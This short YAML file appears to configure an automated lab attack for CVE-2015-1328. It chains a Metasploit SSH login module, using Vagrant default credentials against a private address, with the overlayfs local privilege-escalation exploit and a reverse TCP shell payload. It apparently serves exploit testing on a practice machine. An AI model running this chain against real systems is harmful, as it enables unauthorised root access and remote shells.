cve: CVE-2015-1328

metasploit_module:
  - module_type: auxiliary
    module_name: auxiliary/scanner/ssh/ssh_login
    options:
      - name: RHOSTS
        var: 192.168.33.10
      - name: USERNAME
        var: vagrant
      - name: PASSWORD
        var: vagrant
  - module_type: exploit
    module_name: exploit/linux/local/overlayfs_priv_esc
    options:
      - name: VERBOSE
        var: true
      - name: PAYLOAD
        var: linux/x86/shell/reverse_tcp
      - name: TARGET
        var: 0
      - name: SESSION
        var: 1

